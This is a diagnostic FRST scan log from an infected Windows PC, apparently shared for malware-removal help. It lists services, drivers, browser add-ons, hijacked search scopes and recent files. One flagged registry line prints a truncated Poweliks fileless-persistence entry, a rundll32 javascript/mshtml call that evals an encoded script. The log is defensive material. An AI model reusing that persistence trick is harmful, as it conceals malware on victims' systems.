() C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
(Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-11-28] (Realtek Semiconductor)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79112 2011-06-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [440632 2014-08-29] (Malwarebytes Corporation)
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\MountPoints2: {7304c3fd-60a8-11e2-a79a-4061869b0540} - I:\MotoCastSetup.exe -a
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [Norton Download Manager{N360P204040-SHPD-FSD33017}] => C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKLM-x32 - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^UX^xdm245^S09956^us&si=CD3493&ptb=2ED6C914-50F3-4D57-87A1-287899C3E724&ind=2014061911&n=780c2557&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - 68B8CF96730C4D55A37F7E95660E8E82 URL = https://search.yahoo.com/search?p={searchTerms}&fr=chr-gl-gen1
SearchScopes: HKCU - {0036D865-6B0E-44BF-BF79-C6EF9B4AD1BA} URL = http://search.conduit.com/Results.aspx?ctid=CT3300025&SearchSource=45&UM=2&q={searchTerms}
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {0A68AFD5-88A3-4B37-89B8-769F0B5839EC} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=46C12D40-F7A5-49F9-9A9A-C6CB121F860E&apn_sauid=3CF0AC1D-3891-468B-A8BB-BCDF34623CBC
SearchScopes: HKCU - {2BA28830-5973-429F-8F10-532CD9EDEF54} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3294791&CUI=UN39725252282202430&UM=2
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^UX^xdm245^S09956^us&si=CD3493&ptb=2ED6C914-50F3-4D57-87A1-287899C3E724&ind=2014061911&n=780c2557&psa=&st=sb&searchfor={searchTerms}
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} ->  No File
BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {119CE688-A7E9-1941-8E10-F42990BBA4C4} https://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 216.144.187.199 24.229.54.212 204.186.80.229

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprjplug;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpchromebrowserrecordext;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprphtml5videoshim;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\79\npappdetector.dll (Citrix Online)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\safeguard-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\safeguard-secure-search.xml
FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-07-10]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-08-31]
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: No Name - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-05-21]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-25]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2014-02-17]

Chrome:
=======
CHR HomePage: Default -> https://www.google.com/
CHR Profile: C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Norton Identity Safe) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-21]
CHR Extension: (RoboForm Lite Password Manager) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\kidhjpmgjfbkmcfpfakmdddddgfbhahj [2014-08-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-02-19]
CHR Extension: (Google Wallet) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-19]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 GsServer; C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [8574096 2014-03-30] ()
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [441144 2014-08-29] (Malwarebytes Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-04] (Symantec Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [289496 2013-11-28] (Realtek Semiconductor)
S3 B-Service; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S1 A2DDA; No ImagePath
S0 amdkmafd; C:\Windows\System32\DRIVERS\amdkmafd.sys [21160 2013-10-16] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [36096 2013-10-16] (Advanced Micro Devices, Inc.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63000 2014-08-30] ()
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2013-11-04] ()
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-10-23] (Intel Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-25] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
S3 RdpVideoMiniport; No ImagePath
S3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-08-15] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-16] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-10-25] ()
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-02-17] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-22 23:12 - 2014-10-22 23:12 - 00007576 _____ () C:\Users\Greg\Desktop\attach.txt
2014-10-22 23:12 - 2014-10-22 23:11 - 00019296 _____ () C:\Users\Greg\Desktop\dds.txt
2014-10-22 06:49 - 2014-10-25 09:47 - 00000000 ____D () C:\FRST
2014-10-22 00:31 - 2014-10-22 00:33 - 00000000 ____D () C:\AdwCleaner
2014-10-22 00:02 - 2014-10-22 22:58 - 00000000 ____D () C:\Users\Greg\Desktop\VirusCleanup
2014-10-21 15:04 - 2014-10-21 15:04 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Exploit.lnk
2014-10-21 15:04 - 2014-10-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 12:23 - 2014-10-25 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-21 12:22 - 2014-10-21 15:01 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-21 12:22 - 2014-10-21 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-20 19:42 - 2014-10-20 20:31 - 00000000 ____D () C:\Users\Greg\AppData\Local\NPE
2014-10-16 11:01 - 2014-10-16 11:01 - 00001163 _____ () C:\SeagateAdapter
2014-10-15 17:38 - 2014-10-15 17:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 14:42 - 2014-10-17 15:27 - 00000000 ____D () C:\Users\Greg\AppData\Local\American Enterprise
2014-10-15 14:41 - 2014-10-15 14:41 - 00000358 _____ () C:\Users\Greg\Desktop\Medico.appref-ms
2014-10-15 14:41 - 2014-10-15 14:41 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\American Enterprise Group, Inc
2014-10-13 22:31 - 2014-10-13 22:31 - 00001627 _____ () C:\Users\Greg\Desktop\Clients_Medicare.csv
2014-10-13 16:10 - 2014-10-21 16:29 - 00000000 ____D () C:\Users\Greg\Documents\Pacific life
2014-10-04 09:50 - 2014-10-04 09:50 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-09-30 06:43 - 2014-09-30 06:43 - 00000000 ____D () C:\Users\Greg\Documents\Millionaire Series
2014-09-25 18:16 - 2014-09-25 18:16 - 00000355 _____ () C:\Users\Greg\Desktop\Rapid Reflux Relief.url

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-25 09:46 - 2014-02-04 15:00 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000.job
2014-10-25 09:44 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-25 09:44 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-25 09:40 - 2013-09-05 18:28 - 00016152 _____ () C:\Windows\system32\Drivers\SWDUMon.sys
2014-10-25 09:40 - 2013-09-05 18:28 - 00002840 _____ () C:\Windows\System32\Tasks\DriverUpdate Startup
2014-10-25 09:40 - 2013-09-05 18:28 - 00000416 _____ () C:\Windows\Tasks\DriverUpdate Startup.job
2014-10-25 09:40 - 2013-01-20 11:25 - 00000000 ____D () C:\Temp
2014-10-25 09:40 - 2011-07-14 23:39 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-25 09:36 - 2011-09-27 10:54 - 25093619 _____ () C:\Windows\setupact.log
2014-10-25 09:36 - 2011-07-14 23:39 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
